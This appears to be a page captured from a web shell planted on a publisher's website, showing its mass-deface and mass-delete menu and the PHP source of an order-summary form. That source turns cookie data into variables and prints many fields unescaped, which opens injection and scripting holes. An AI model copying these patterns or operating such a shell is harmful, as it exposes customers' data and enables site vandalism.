shell bypass 403

Cubjrnet7 Shell

: /home/eklavya/www/pdfs/ekl_13_10_2023/order/ [ drwxr-xr-x ]
upload mass deface mass delete console info server

name : total.php
<?php
session_start();

//Declare all variables here
$books_r = array();

include ("global.inc.php");
include("connection.inc.php");
display_page_header("Eklavya Publications Order Summary");

//Make sure we are coming here from the order form page


if (!isset($_POST["qty"]))
	die ("Click <a href='http://www.eklavya.in/order'>here</a> to create an order form");

//Read POSTed quantities
$qty_r = array();

foreach ($_POST as $key=>$pvar) 
{
	
	if ($key == "qty")
	$qty_r = $pvar;
}

//... and validate quantities (must be positive integers)
foreach($qty_r as $key=>$qty) {
	$qty = trim($qty);
	if (trim($qty) != "") {
		if (!is_numeric($qty))
			die ("Quantity must be a number!");
		if ($qty < 0 or !ctype_digit($qty))
			die ("Sorry, we do not take orders for <strong>$qty</strong> books! :-)");
	}
}
# Get states
$StateArray = get_states($country_id = INDIA);
//Fetch the book list (book category, book name, price) into an array-----------
include ("books.inc.php");
$numBooks = count($books_r);


$CustName = '';
$CustLastName = '';
$CustCompanyName = '';
$CustAddr = '';$CustStreet = '';$CustTaluka = '';
$CustDist = '';$CustState = '';
$CustPin = '';$CustEmail = '';$CustSTD = '';$CustPhone = '';$CustMobile = '';
$CustWebsite = '';$CustNote = '';$order_is_payment_online = '1';$OrderShiptoName = '';
$send_order_copy_to_cust = 1;
$OrderShiptoSurname = '';$OrderShiptoCompanyName = '';$OrderShiptoAddr1 = '';
$OrderShiptoAddr2 = '';$OrderShiptoAddr3 = '';$OrderShiptoCity = '';$OrderShiptoState = '';
$OrderShiptoPincode = '';$OrderShiptoEmail = '';$OrderShiptoSTD = '';
$OrderShiptoPhone = '';$OrderShiptoMobile = '';

$array = getFromCoockies();
foreach($array AS $key => $val)
{
 $$key = stripcslashes($val);
}
//Dislay order summary----------------------------------------------------------
?>
<script type="text/javascript">
  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-36950695-1']);
  _gaq.push(['_trackPageview']);
  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();
</script>

<div id="content_box">
	<h3>Eklavya Publications - Order Summary</h3>
	<table cellspacing="2" cellpadding="2">
	<tr>
		<th>Book Title</th>
		<th>Price (Rs.)</th>
		<th>Quantity</th>
		<th>Amount (Rs.)</th>
	</tr>
	<?php
	$gr_total = 0;
	$magazine_cost = 0;
	$order = array();
	$order_has_magazines = 0;
	foreach ($qty_r as $key=>$qty) 
	{
		
		if ($qty != "") {
		
			?>
			<tr>
				<td><?php
				print $books_r[$key]["title"];
				if ($books_r[$key]["isnew"] == 1) {
					?><img src="new_book.gif" alt="New item icon" title="New item"><?php ;}?>
				</td>
				<td class="amt"><?php print $books_r[$key]["price"] ?></td>
				<td class="amt"><?php print $qty ?></td>
				<?php 
				//Moved '$total = ' to above the if stmt and added previous mag-cost to current -MMM/04oct08
				$total = $qty * $books_r[$key]["price"] ;
				if ($books_r[$key]["category"] == CATEGORY_SUBSCRIPTION) //Replaced MAGAZINES with CATEGORY_SUBSCRIPTION define. MMM/16jul09
	    	  $magazine_cost += $total;
					# Set flag true if the order has any magazines. Magazine subscription has no postage.
						$order_has_magazines = 1;
				?>
				<td class="amt"><?php print $total ?></td>
			</tr>
			<?php
			$gr_total += $total;
			
			//Simultaneously build an array for sending the email
			$order[] = array($books_r[$key]["title"], $books_r[$key]["price"], $qty, $total);
		}
		
	}
	# Added by - kaustubh dated 10 Feb 2011
	# ceil the total.
	?>
	<tr>
		<td colspan='3' style='text-align: right; font-weight: bold;'>Total</td>
		<td class="amt" style='font-weight: bold;'><?php print ceil($gr_total) ?></td>
	</tr>
	
	<?php
	//Compute the postage charges
	$postage = 0;
	
	
		$gr_total_without_mag = 0;
	
	/*	updated by ketan 7 sept 2011 for Postage value problem
			Since magazine subscription has no postage, the magazine cost must be subtracted from grand total - in order to
			calculate postage.
	*/
	if($order_has_magazines = 1)
	{
		$gr_total_without_mag = $gr_total - $magazine_cost;
	}
	# if the order contains titles other than magazines and also if grand total is below Rs. 500, then add postage
	if($gr_total_without_mag != 0 and $gr_total <= 500) 
	{
		# if order total is below Rs. 300 then add 30 rupees as postage 	
	  if ($gr_total_without_mag <= 300)
		{
		  $postage = 30;
		}
		else
		# if order total is between Rs. 301 and 500, then add 50 rupees as postage 
		{
		  $postage = 50;
		}
	
	
		?>
		<tr>
			<td colspan='3' style='text-align: right; font-weight: bold;'>Postage </td>
			<td class="amt" style='font-weight: bold;'><?php print $postage ?></td>
		</tr>
		<tr>
			<td colspan='3' style='text-align: right; font-weight: bold;'>Total payable</td>
			<td class="amt" style='font-weight: bold;'><?php print ceil($gr_total+$postage) ?></td>
		</tr>
	<?php
	}	
	?>
	</table>
	<?php
	$total_s = '<tr><td colspan="2">Total</td><td>Rs. '.ceil($gr_total).'</td></tr>';
	if ($postage != 0) {
		$total_s .= '<tr><td colspan="2">Postage</td><td>Rs. '.ceil($postage).'</td></tr>';
		$total_s .= '<tr><td colspan="2">Amount payable</td><td>Rs. '.ceil($gr_total+$postage).'</td></tr>';
	
	}
	$total .= $total_s;

	//Serialize the order data array so it can be passed to the emailer script
	$order = serialize($order);
	$_SESSION['myorder'] = $order;

	?>
	<p class="fp_note">Note: To add or remove books, please click the BACK button in your browser,<br>
	make modifications to the Order form and click Submit again</p>
	<?php 
	
	//Display contact form--------------------------------------------------------
	?>
	<form enctype='multipart/form-data' action='process.php' method='post' onsubmit="return validateContact(this)">
	<!--input name="order" type="hidden" value='<?php $order ?>'-->
	<input name="grtotal" type="hidden" value="<?php print ceil($gr_total) ?>">
	<input name="postage" type="hidden" value="<?php print ceil($postage) ?>">
	<br>
	<h4>Customer details</h4>
	<p style="margin-bottom: 0;">Fields marked with * are mandatory</p>
	<table cellspacing='2' width='60%' cellpadding='5'>
	<tr>
		<td colspan="2"><input type="checkbox" name="AvoidCoockieStorage" id="AvoidCoockieStorage" value="yes">&nbsp;<label for="AvoidCoockieStorage"><b>Do not save my details, I'm sitting in a public place like a Netcafe</b></label></td>
	</tr>
	<tr>
		<td>First Name *</td><td><input type="text" name="CustName" id="CustName" size="50" maxlength="50" value="<?php echo $CustName; ?>"></td>
	</tr>
	<tr>
		<td>Last Name *</td><td><input type="text" name="CustLastName" id="CustLastName" size="50" maxlength="50" value="<?php echo $CustLastName; ?>"></td>
	</tr>
	<tr>
		<td>Company Name</td><td><input type="text" name="CustCompanyName" id="CustCompanyName" size="50" maxlength="150" value="<?php echo $CustCompanyName; ?>"></td>
	</tr>
	<tr>
		<td>Address/House No. *</td><td><input type="text" name="CustAddr" id="CustAddr" size="50" maxlength="200" value="<?php echo htmlspecialchars($CustAddr); ?>"></td>
	</tr>
	<tr>
		<td>Street/Village</td><td><input type="text" name="CustStreet" id="CustStreet" size="50" maxlength="200" value="<?php echo $CustStreet; ?>"></td>
	</tr>
	<tr>
		<td>Area/Taluka</td><td><input type="text" name="CustTaluka" id="CustTaluka" size="25" maxlength="200" value="<?php echo $CustTaluka; ?>"></td>
	</tr>
	<tr>
		<td>City/District *</td><td><input type="text" name="CustDist" id="CustDist" size="25" maxlength="50" value="<?php echo $CustDist; ?>"></td>
	</tr>
	<tr>
		<td>State *</td>
		<td>
				<!--input type="text" name="CustState" id="CustState" size="25" maxlength="100"-->
				<select name="CustState" id="CustState">
				<option value="">Please select</option>
				<?php 
				foreach($StateArray AS $key => $val)
				{
				 echo '<option value="'.$key.'"';
				 if($CustState == $key)echo ' selected="selected"';
				 echo '>'.$val.'</option>';
				}
				 ?>
				</select>
		</td>
	</tr>
	<tr>
		<td>Pin code *</td><td><input type="text" name="CustPin" id="CustPin" size="10" maxlength="6" value="<?php echo $CustPin; ?>"></td>
	</tr>
	<tr>
		<td>Email Address *</td><td><input type="text" name="CustEmail" id="CustEmail" size="50" maxlength="150" value="<?php echo $CustEmail; ?>"></td>
	</tr>
	<tr>
		<td>Website/Blog</td><td><input type="text" name="CustWebsite" id="CustWebsite" size="50" maxlength="100" value="<?php echo $CustWebsite; ?>"></td>
	</tr>
	<tr>
		<td>Phone (STD code + Number) *</td>
		<td><input type="text" name="CustSTD" id="CustSTD" size="7" maxlength="6" value="<?php echo $CustSTD; ?>">
		<input type="text" name="CustPhone" id="CustPhone" size="15" maxlength="10" value="<?php echo $CustPhone; ?>"></td>
	</tr>
	<tr>
		<td>Mobile number</td>
		<td><input type="text" name="CustMobile" id="CustMobile" size="15" value="<?php echo $CustMobile; ?>"></td>
	</tr>
	<tr>
		<td>&nbsp;</td>	
		<td>
				<input type="checkbox" name="NotSameAsAbove" id="NotSameAsAbove"  onclick="ResetShippingAddressFields()"/> <label for="NotSameAsAbove">Click here if your shipping address is different</label>
				<input type="hidden" name="CopyTheContent" id="CopyTheContent" value="<?php echo !isset($_COOKIE['content'])?'1':'0';?>"/>
		</td>	
	</tr>
	
	</table>
	
	<div id="shipping_address" <?php if(!isset($_COOKIE['content'])){?>style="display:none;"<?php } ?>>
	<h4>Shipping details</h4>
	<table cellspacing='2' width='60%' cellpadding='5'>
	<!--tr>
		<td colspan="2">
				<input type="button" name="SameAsAbove" id="SameAsAbove" value="Click to copy customer details" onclick="CopyShippingDtls()" />
		</td>	
	</tr-->
	<tr>
		<td>First Name *</td><td><input type="text" name="OrderShiptoName" id="OrderShiptoName" size="50" maxlength="50" value="<?php echo $OrderShiptoName; ?>"></td>
	</tr>
	<tr>
		<td>Last Name *</td><td><input type="text" name="OrderShiptoSurname" id="OrderShiptoSurname" size="50" maxlength="50" value="<?php echo $OrderShiptoSurname; ?>"></td>
	</tr>
	<tr>
		<td>Company Name</td><td><input type="text" name="OrderShiptoCompanyName" id="OrderShiptoCompanyName" size="50" maxlength="150" value="<?php echo $OrderShiptoCompanyName; ?>"></td>
	</tr>
	<tr>
		<td>Address/House No. *</td><td><input type="text" name="OrderShiptoAddr1" id="OrderShiptoAddr1" size="50" maxlength="200" value="<?php echo htmlspecialchars($OrderShiptoAddr1); ?>"></td>
	</tr>
	<tr>
		<td>Street/Village</td><td><input type="text" name="OrderShiptoAddr2" id="OrderShiptoAddr2" size="50" maxlength="200" value="<?php echo $OrderShiptoAddr2; ?>"></td>
	</tr>
	<tr>
		<td>Area/Taluka</td><td><input type="text" name="OrderShiptoAddr3" id="OrderShiptoAddr3" size="25" maxlength="200" value="<?php echo $OrderShiptoAddr3; ?>"></td>
	</tr>
	<tr>
		<td>City/District *</td><td><input type="text" name="OrderShiptoCity" id="OrderShiptoCity" size="25" maxlength="50" value="<?php echo $OrderShiptoCity; ?>"></td>
	</tr>
	<tr>
		<td>State *</td>
		<td>
				<select name="OrderShiptoState" id="OrderShiptoState">
				<option value="">Please select</option>
				<?php 
				foreach($StateArray AS $key => $val)
				{
				 echo '<option value="'.$key.'"';
				 if($CustState == $key)echo ' selected="selected"';
				 echo '>'.$val.'</option>';
				}
				 ?>
				</select>		
		</td>
	</tr>
	<tr>
		<td>Pin code *</td><td><input type="text" name="OrderShiptoPincode" id="OrderShiptoPincode" size="10" maxlength="6" value="<?php echo $OrderShiptoPincode; ?>"></td>
	</tr>
	<tr>
		<td>Email Address *</td><td><input type="text" name="OrderShiptoEmail" id="OrderShiptoEmail" size="50" maxlength="150" value="<?php echo $OrderShiptoEmail; ?>"></td>
	</tr>
	<tr>
		<td>Phone (STD code + Number) *</td>
		<td><input type="text" name="OrderShiptoSTD" id="OrderShiptoSTD" size="7" maxlength="6" value="<?php echo $OrderShiptoSTD; ?>">
		<input type="text" name="OrderShiptoPhone" id="OrderShiptoPhone" size="15" maxlength="10" value="<?php echo $OrderShiptoPhone; ?>"></td>
	</tr>
	<tr>
		<td>Mobile number</td>
		<td><input type="text" name="OrderShiptoMobile" id="OrderShiptoMobile" size="15" value="<?php echo $OrderShiptoMobile; ?>"></td>
	</tr>
	</table>
	</div>
	<table cellspacing='2' width='60%' cellpadding='5'>
	<tr><td style="background:#fff;" colspan="2">&nbsp;</td></tr>
	<tr>
		<td style="vertical-align:top;">Special instructions</td>
		<td><textarea cols="37" rows="3" name="CustNote" id="CustNote"><?php echo $CustNote;?></textarea></td>
	</tr>
	</table>
	<div class="fp_note">
		<ul>
			Please note:
			<li>On receiving order email, consignment will be dispatched within 3 days by courier/cargo or Express Parcel Post.
			<li>In case of non-receipt of books within 10 days, please send a reminder at [email protected].
			<li>Consignment will also contain a bill. 
			<li>If you haven't sent advance payment, do so as soon as the material reaches.
			<li>Kindly send payments in favour of Eklavya, Bhopal by Demand Draft/Cheque at par/Money Order.
			<li>Receipt will be sent on arrival of DD/Cheque/MO.
		</ul>
	</div>
	<br>
	<input type="submit" value="Submit For Online Payment" name="order_is_payment_online[]" />&nbsp;
	<input type="submit" value="Submit For Offline Payment" name="order_is_payment_online[]" />
	</form>
</div><!-- End of content_box -->
</body>
</html>

© 2025 Cubjrnet7